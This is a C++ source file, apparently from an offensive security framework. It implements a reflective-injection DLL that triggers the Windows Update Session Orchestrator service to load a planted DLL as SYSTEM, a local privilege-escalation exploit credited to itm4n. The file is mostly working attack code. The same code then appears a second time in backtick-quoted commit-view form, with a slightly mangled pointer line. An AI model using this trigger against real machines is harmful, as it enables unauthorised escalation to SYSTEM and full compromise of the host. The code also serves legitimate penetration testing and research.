external/source/uso_trigger/main.cpp

/* 
 * Update Session Orchestrator service DLL load trigger
 * 
 * Author:
 *   itm4n
 * References:
 *   - https://github.com/itm4n/UsoDllLoader
 *   - https://itm4n.github.io/usodllloader-part1/
 *   - https://itm4n.github.io/usodllloader-part2/
 *
 * Load this DLL to trigger the Update Session Orchestrator service to load the
 * DLL at C:\Windows\System32\WindowsCoreDeviceInfo.dll as NT_AUTHORITY\SYSTEM.
 * The "Windows Update" service must be running for this technique to work.
 */

#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "MiniUsoClient.h"

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <windows.h>

BOOL trigger(void) {
	MiniUsoClient miniUsoClient;
	DWORD dwDelay = 2000;

	if (!miniUsoClient.Run(USO_STARTSCAN)) {
		return FALSE;
	}
	Sleep(dwDelay);

	if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN)) {
		return FALSE;
	}
	Sleep(dwDelay);

	if (!miniUsoClient.Run(USO_STARTDOWNLOAD)) {
		return FALSE;
	}

	return TRUE;
};

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
	BOOL bReturnValue = TRUE;
	switch (dwReason)
	{
	case DLL_QUERY_HMODULE:
		hAppInstance = hinstDLL;
		if (lpReserved != NULL)
		{
			*(HMODULE*)lpReserved = hAppInstance;
		}
		break;
	case DLL_PROCESS_ATTACH:
		hAppInstance = hinstDLL;
		trigger();
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}
	return bReturnValue;
}
Add Uso dll 2020-04-23 15:18:22 -05:00			`/*`
			`* Update Session Orchestrator service DLL load trigger`
			`*`
			`* Author:`
			`* itm4n`
			`* References:`
			`* - https://github.com/itm4n/UsoDllLoader`
			`* - https://itm4n.github.io/usodllloader-part1/`
			`* - https://itm4n.github.io/usodllloader-part2/`
			`*`
			`* Load this DLL to trigger the Update Session Orchestrator service to load the`
			`* DLL at C:\Windows\System32\WindowsCoreDeviceInfo.dll as NT_AUTHORITY\SYSTEM.`
			`* The "Windows Update" service must be running for this technique to work.`
			`*/`

			`#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR`
			`#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN`
			`#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"`
			`#include "MiniUsoClient.h"`

			`#include <stdio.h>`
			`#include <stdint.h>`
			`#include <stdlib.h>`
			`#include <windows.h>`

			`BOOL trigger(void) {`
			`MiniUsoClient miniUsoClient;`
			`DWORD dwDelay = 2000;`

			`if (!miniUsoClient.Run(USO_STARTSCAN)) {`
			`return FALSE;`
			`}`
			`Sleep(dwDelay);`

			`if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN)) {`
			`return FALSE;`
			`}`
			`Sleep(dwDelay);`

			`if (!miniUsoClient.Run(USO_STARTDOWNLOAD)) {`
			`return FALSE;`
			`}`

			`return TRUE;`
			`};`

			`BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)`
			`{`
			`BOOL bReturnValue = TRUE;`
			`switch (dwReason)`
			`{`
			`case DLL_QUERY_HMODULE:`
			`hAppInstance = hinstDLL;`
			`if (lpReserved != NULL)`
			`{`
			`(HMODULE)lpReserved = hAppInstance;`
			`}`
			`break;`
			`case DLL_PROCESS_ATTACH:`
			`hAppInstance = hinstDLL;`
			`trigger();`
			`break;`
			`case DLL_PROCESS_DETACH:`
			`case DLL_THREAD_ATTACH:`
			`case DLL_THREAD_DETACH:`
			`break;`
			`}`
			`return bReturnValue;`
			`}`